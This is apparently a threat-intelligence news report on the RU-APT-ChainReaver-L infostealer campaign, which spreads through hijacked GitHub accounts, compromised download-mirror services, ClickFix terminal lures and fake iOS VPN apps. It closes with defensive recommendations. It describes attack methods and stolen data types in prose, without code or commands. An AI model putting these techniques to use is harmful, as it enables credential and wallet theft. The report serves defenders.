A sophisticated, cross-platform cyber campaign dubbed RU-APT-ChainReaver-L is actively compromising trusted websites and GitHub repositories to distribute infostealer malware. This extensive supply chain attack targets users across Windows, macOS, and iOS, leveraging advanced techniques like valid code signing and deceptive redirects to evade detection and deliver malicious payloads.
The RU-APT-ChainReaver-L campaign, identified by GRAPH analysts, has been operating for several months, leading to a significant volume of stolen user credentials appearing on dark web marketplaces. The attackers have meticulously built an infrastructure encompassing over 100 domains, including command-and-control servers and redirection intermediaries, demonstrating a remarkable scale and complexity in their operations. This sophisticated threat highlights the evolving landscape of supply chain attacks and the critical need for enhanced cybersecurity measures.
GitHub Exploitation and Malware Capabilities
The campaign’s operators have demonstrated a keen understanding of security vulnerabilities by compromising approximately 50 GitHub accounts. Many of these accounts were established, with years of history, making them appear legitimate when used to host malicious repositories. These accounts were primarily hijacked in November 2025 and subsequently repurposed to distribute cracked software and activation tools, preying on individuals actively searching for pirated software.
The attack methodology varies significantly depending on the target operating system. For Windows users, the campaign redirects victims to cloud storage services such as MediaFire and Dropbox. Here, password-protected archives contain malware that has been signed with valid code certificates from multiple companies, making it appear legitimate to traditional security software. This technique significantly complicates detection efforts for antivirus and endpoint detection and response (EDR) systems.
macOS users are subjected to “ClickFix” attacks, where deceptive web pages trick them into manually executing terminal commands. These commands are designed to download and install the MacSync Stealer malware. This method of execution bypasses some standard security protocols by relying on direct user interaction to initiate the infection process.
Meanwhile, iOS users are directed to fraudulent VPN applications listed on the Apple App Store. Once installed, these applications are designed to launch phishing attacks against the user’s device, attempting to steal sensitive information through deceptive prompts.
Sophisticated Infrastructure and Evasion Tactics
At the heart of the RU-APT-ChainReaver-L campaign is its ingenious exploitation of file-sharing mirror services. Attackers have compromised two major platforms, Mirrored.to and Mirrorace.org, which are widely utilized by numerous software download websites globally. By injecting malicious code into these trusted services, the threat actors effectively transformed legitimate infrastructure into potent delivery mechanisms for their infostealer malware.
When users attempt to download files through these compromised services, they are subjected to a series of deceptive redirect chains. These intermediary pages are carefully crafted to bypass security detection while meticulously maintaining an appearance of legitimacy, ensuring that the user proceeds with the malicious download without raising immediate suspicion. The constant evolution of their tools and infrastructure, with frequent modifications to malware signatures and delivery methods, further aids their efforts to evade antivirus detection.
The Windows malware component functions as a potent infostealer. It is capable of capturing screenshots, extracting data from cryptocurrency wallets, messenger databases, and browser credentials. Furthermore, it can copy sensitive files from common user directories such as Desktop, Documents, and Downloads. This broad data exfiltration capability underscores the significant risk posed by this malware.
Similarly, the macOS MacSync Stealer operates filelessly in memory, meaning it leaves minimal traces on the disk, making forensic analysis more challenging. Its data collection capabilities include browser data, cryptocurrency wallets from popular providers like Ledger and Trezor, SSH keys, and AWS credentials. The insidious nature of its in-memory operation enhances its stealth and prolongs its operational life before detection.
Organizations are urged to implement comprehensive defense strategies to mitigate the risks associated with such sophisticated attacks. The most critical layer of defense remains robust user education, as many infections rely heavily on social engineering tactics. Security teams should deploy multi-layered endpoint protection, including EDR systems specifically configured to detect unusual process behaviors and suspicious file access patterns.
Network monitoring should be intensified, with a focus on connections to file-sharing services and newly registered domains, as these are common indicators of compromise. Restricting direct internet access for user systems and routing all downloads through file analysis platforms that employ static analysis, dynamic analysis, and machine learning can provide an additional crucial layer of security. The ongoing nature of these attacks suggests that continuous vigilance and adaptation of security measures will be essential moving forward.